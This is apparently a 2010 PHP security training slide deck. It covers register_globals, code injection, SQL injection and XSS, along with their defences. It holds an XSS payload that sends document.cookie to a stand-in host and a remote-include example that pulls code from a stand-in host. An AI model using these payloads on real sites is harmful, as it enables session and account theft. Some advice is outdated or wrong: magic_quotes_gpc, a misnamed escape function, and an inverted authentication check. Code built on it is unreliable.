Php security

Unit 18-1, 3rd Mile Square, No 151, Jalan Klang Lama,

Batu 3 1/2, 58100 Kuala Lumpur Tel : +603-7981 4422 / +603-7981 2875

Fax : +603-7981 9166

Copyright @ Alsys MSC SDN BHD 2010



Fax : +603-7981 9166


• Importance of PHP Security

• Concerns of PHP Security

1. Input Validation

2. Register Global

3. Code Injection

4. SQL injection

5. Cross-site Scripting (XSS)



Fax : +603-7981 9166


• Protect server from crash

• Prevent malicious user have root access

• Protect customer data



Fax : +603-7981 9166


• All User Inputs are unreliable and can’t be trusted

Solution:

• Need to Validate any user input before use

• Validation on the client side is good for the user

• Validation on the server side is good for security



Fax : +603-7981 9166


• When “register_globals” is set ON, un-initialized variable can

be injected via user inputs

• Example

<?php

if(authenticate_user()) {

$authenticated = true; }

- - - - -

if($authenticated) {

die(“Authentication required”); }

?>

If set $authenticated to 1 via GET, http://ffs.com/admin.php?authenticated=1



Fax : +603-7981 9166


• Set “register_globals” Off in php.ini(Disabled by default in

versions >= 4.1.0)

• Alternative to Register Global : SUPER GLOBALS• $_GET – data from get requests

• $_POST – post request data

• $_COOKIES – cookie information

• $_FILES – upload file data

• $_SERVER - server data

• $_ENV – environment variable

• $_REQUEST – mix of GET, POST, COOKIE



Fax : +603-7981 9166


• Dynamic paths/files used in require/include statements

• Example:<?php

include “{$_GET[‘path’]}/script.php”;

?>

If set $path to “http://www.hackers.com” via GET,

<?php

include “http://www.hackers.com/script.php”;

?>

• Avoid using dynamic paths

• Always use full path, defined by constants



Fax : +603-7981 9166


• Allow a Malicious SQL code on server

• Allow Malicious user have root access

• Removal of data

• Modification of existing values

• Denial of service



Fax : +603-7981 9166


• MYSQL Prepared Statement - using mysqli::prepare()

• Validate input data before send to the database

• addslashes(), mysql_real_escape()

• magic_quotes_gpc - Set to ON

• error_reporting - Set to E_ALL

• display_error – Set to ON in development, OFF in production

• log_errors – Set to ON in production

• error_log – Set to the desired location of the error log



Fax : +603-7981 9166


• Inject HTML/Script in a page, Pass a request to another Site

• Session take-over

• Password theft

• User tracking by 3rd Parties

• Example:

<script>document.location =

"http://cookiehaker.com/xss.php?"+document.cookie</script>



Fax : +603-7981 9166


• Server Side Validation for all Input Data

• htmlspecialchars() – encodes ‘,”,<,>,&

• htmlentities() – Convert all applicable chars to HTML entities

• strip_tags() – Remove HTML and PHP tags



Fax : +603-7981 9166


• XSS Me - https://addons.mozilla.org/en-US/firefox/addon/7598/

• Web Developer Tool

• Firefox – https://addons.mozilla.org/en-US/firefox/addon/60/

• IE - http://www.microsoft.com/downloads/details.aspx?

• FamilyID=E59C3964-672D-4511-BB3E-2D5E1DB91038

• Firebug - https://addons.mozilla.org/en-US/firefox/addon/1843/



Fax : +603-7981 9166




Fax : +603-7981 9166


Technology

Php security